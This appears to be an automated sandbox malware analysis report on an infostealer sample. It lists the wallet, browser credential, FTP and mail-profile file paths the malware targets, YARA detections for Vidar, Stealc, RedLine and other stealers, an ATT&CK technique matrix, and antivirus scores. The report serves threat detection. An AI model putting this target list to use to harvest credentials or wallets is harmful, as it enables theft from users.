Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 21.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5c100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5c100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2426494529.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2084106678.0000000005C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2426146878.0000000000FA2000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5mc.0.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ougwwmmp, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19524750000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be8eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19524750000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2024395013.000001950682B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 21.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5c100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5c100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2426494529.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2084106678.0000000005C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2426146878.0000000000FA2000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ougwwmmp, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7092, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2129887694.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5mc.0.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5mc.0.exe PID: 7364, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC00B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6BC00B40
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB28EA0 sqlite3_clear_bindings,	1_2_6BB28EA0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC00D60 sqlite3_bind_parameter_name,	1_2_6BC00D60
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC00C40 sqlite3_bind_zeroblob,	1_2_6BC00C40
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB263C0 PR_Bind,	1_2_6BB263C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	289 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	31 Software Packing	LSA Secrets	551 Security Software Discovery	SSH	11 Input Capture	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
QPoX60yhZt.exe	42%	Virustotal		Browse
QPoX60yhZt.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\ougwwmmp	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ougwwmmp	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\ougwwmmp	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
